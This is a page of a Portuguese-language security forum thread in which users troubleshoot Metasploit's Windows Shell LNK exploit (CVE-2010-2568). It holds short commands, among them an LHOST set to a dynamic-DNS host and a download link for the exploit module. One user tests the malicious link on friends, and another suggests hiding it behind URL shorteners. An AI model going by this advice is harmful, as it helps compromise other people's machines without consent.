Page 2 of 3 FirstFirst 123 LastLast
Results 11 to 20 of 22

Thread: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video Demo

  1. #11
    Just burned his ISO pinha's Avatar
    Join Date
    Jan 2011
    Location
    Piracicaba/sp
    Posts
    9

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Quote Originally Posted by Bhior View Post
    requer uma configuração para que você possa usar o metasploit na internet.
    OU
    Seus amigos compartilham a mesma rede local que a sua?
    []'
    Queria testar na internet nao localmente.. entendi que o backtrack emulado pelo virtualbox ele gera esse ip local 10.0.2.15 axei que funcionaria remotamente.. No caso teria que instalar o bt no hd pra poder configurar pela minha internet ou pelo virtualbox teria como ?

  2. #12
    Senior Member Bhior's Avatar
    Join Date
    Apr 2010
    Posts
    152

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Quote Originally Posted by pinha View Post
    Queria testar na internet nao localmente.. entendi que o backtrack emulado pelo virtualbox ele gera esse ip local 10.0.2.15 axei que funcionaria remotamente.. No caso teria que instalar o bt no hd pra poder configurar pela minha internet ou pelo virtualbox teria como ?
    Se em sua configuração de rede, esse endereço IP foi atribuído pelo seu router, você pode configurar seu router, ou usar algum DNS publico ou pago, para usar o metasploit na internet.
    Mas e uma coisa que não vou pode te mostrar.

    Abraços
    Last edited by Bhior; 02-02-2011 at 07:37 PM.

  3. #13
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    gerou normal o link do client
    \\10.0.2.15\sRaVXmUk\
    enviei pra alguns amigos para testar mas nada de abrir a sessao...
    Com certeza nao abrirá nenhuma sessão!
    Dê uma estudada sobre redes de computadores, endereçamento de IPs, entenda o que é LAN, WAN, MAN, PAN, etc... Se realmente quer aprender, você deve saber no mínimo os tópicos citados.

    Procure a respeito dos payload *dns e utilize tbm o DynDns, com isso você pode deixar seu LHOST como blablabla.dyndns.net, exemplo:

    Code:
    set LHOST blablabla.dyndns.net
    Ainda você pode utilizar os encurtadores de URL para o link acima!
    Se não entendeu nada do que falei, pode estudar mais um pouco!

    Att,
    (gdb) disass m(y_br)ain

    ®

  4. #14
    Just burned his ISO pinha's Avatar
    Join Date
    Jan 2011
    Location
    Piracicaba/sp
    Posts
    9

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Muito obrigado bhior e espreto me ajudaram bastante sim!!
    vou estudar mais sobre dns sim e checar esse DynDns

    valeu

  5. #15
    Just burned his ISO Maque's Avatar
    Join Date
    Feb 2011
    Posts
    9

    Default Respuesta: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution V

    Boa noite pessoal;

    Creio que nas versões mais atuais do metasploit o referido módulo(ms10_xxx_windows_shell_lnk_execute) tenha uma nome diferente, pelo menos aqui na versão 3.5.2 não consegui encontrar este módulo, encontrei apenas: windows/browser/ms10_046_shortcut_icon_dllloarder.

    Aproveitando a deixa do tópico, estou com uma pequena dúvida,
    Tenho uma pequena rede caseira(2pcs) e estava tentando explorar essa vulnerabilidade, porém não consigo iniciar a sessão meterpreter. Estou usando slack 13.1 e a "vitima" windows XP, consigo ter acesso ao lnk e ao dll pelo IE, e no console do metasploit aparece os requests dos arquivos, porém a sessão nao inicia nem com reza brava.
    Gostaria de saber se alguém tem alguma idéia do que possa ser.

  6. #16
    Just burned his ISO pinha's Avatar
    Join Date
    Jan 2011
    Location
    Piracicaba/sp
    Posts
    9

    Lightbulb Re: Respuesta: [video] Vulnerability in Windows Shell Could Allow Remote Code Executi

    Quote Originally Posted by Maque View Post
    Boa noite pessoal;

    Creio que nas versões mais atuais do metasploit o referido módulo(ms10_xxx_windows_shell_lnk_execute) tenha uma nome diferente, pelo menos aqui na versão 3.5.2 não consegui encontrar este módulo, encontrei apenas: windows/browser/ms10_046_shortcut_icon_dllloarder.
    Ola caro amigo... entao fera ele nao vem junto nao por padrao, axo que pode resolver vc atualizando seu msf
    Code:
    svn update /pentest/svn/framework3/
    ou add ele manualmente... baixando pelo packetstorm

    Code:
    http://dl.packetstormsecurity.net/1007-exploits/ms10_xxx_windows_shell_lnk_execute.rb.txt
    salve no seu bt renomeia ele pra .rb e mova para essa pasta..

    /pentest/exploits/framework3/modules/exploits/windows/browser

    agora perante os testes na sua rede nao posso te ajudar eu fiz uns testes pelo vm virtualbox mas nao tive bons resultados ainda.

    []s

  7. #17
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    5

    Default Re: Respuesta: [video] Vulnerability in Windows Shell Could Allow Remote Code Executi

    Quote Originally Posted by pinha View Post
    Ola caro amigo... entao fera ele nao vem junto nao por padrao, axo que pode resolver vc atualizando seu msf
    Code:
    svn update /pentest/svn/framework3/
    ou add ele manualmente... baixando pelo packetstorm

    Code:
    http://dl.packetstormsecurity.net/1007-exploits/ms10_xxx_windows_shell_lnk_execute.rb.txt
    salve no seu bt renomeia ele pra .rb e mova para essa pasta..

    /pentest/exploits/framework3/modules/exploits/windows/browser

    agora perante os testes na sua rede nao posso te ajudar eu fiz uns testes pelo vm virtualbox mas nao tive bons resultados ainda.

    []s
    Ola pessoal estou com o mesmo problema que o Maque, ja fiz os passos acima, o arquivo esta na pasta certa, mas quando procuro ele pelo console, ele nao aparece ( search ms10 ) ...
    se tento usa-lo da o seguinte erro

    msf > use windows/browser/ms10_xxx_windows_shell_lnk_execute.rb
    [-] Failed to load module: windows/browser/ms10_xxx_windows_shell_lnk_execute.rb
    alguem sabe o que posso fazer ??

    Obs. ja atualizei o metasploit..
    msfupdate

  8. #18
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    1

    Default Re: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution Video De

    Existe alguma maneira, ou outro método de ter acesso ao disco, mas sem ter que utilizar engenharia social?

    Cumpz

  9. #19
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: Respuesta: [video] Vulnerability in Windows Shell Could Allow Remote Code Executi

    Quote Originally Posted by xcold View Post
    Ola pessoal estou com o mesmo problema que o Maque, ja fiz os passos acima, o arquivo esta na pasta certa, mas quando procuro ele pelo console, ele nao aparece ( search ms10 ) ...
    se tento usa-lo da o seguinte erro



    alguem sabe o que posso fazer ??

    Obs. ja atualizei o metasploit..
    Procure por CVE-2010-2568

    Code:
    msf > search CVE-2010-2568
    (gdb) disass m(y_br)ain

    ®

  10. #20
    Just burned his ISO Maque's Avatar
    Join Date
    Feb 2011
    Posts
    9

    Default Respuesta: [video] Vulnerability in Windows Shell Could Allow Remote Code Execution V

    Realmente foi feita a modificação do nome do módulo nas versões mais recentes:

    Link do resultado da pesquisa no site do metasploit:
    http://www.metasploit.com/modules/ex...icon_dllloader

    Notem que na referencia consta o mesmo CVE.

    Existe até um outro tópico referente a esta mesma vulnerabilidade:

    http://www.backtrack-linux.org/forum...-proteger.html

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. [Video] Remote Desktop com VNC via metasploit
    By Bhior in forum Tutoriais e Howtos
    Replies: 0
    Last Post: 06-24-2010, 04:11 PM
  2. Video Demo "Vom POC zum Exploit SEH" by ozzy
    By ozzy66 in forum Tutorials und Howtos
    Replies: 5
    Last Post: 01-20-2010, 10:41 AM
  3. Replies: 9
    Last Post: 07-26-2009, 10:42 AM
  4. Data Execution Prevention (DEP) in Windows XP and Vista Video
    By Irongeek in forum OLD General IT Discussion
    Replies: 0
    Last Post: 06-08-2008, 06:18 PM
  5. psexec - Microsoft Windows Authenticated User Code Execution
    By imported_dmshady001 in forum OLD Pentesting
    Replies: 4
    Last Post: 04-13-2008, 02:39 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •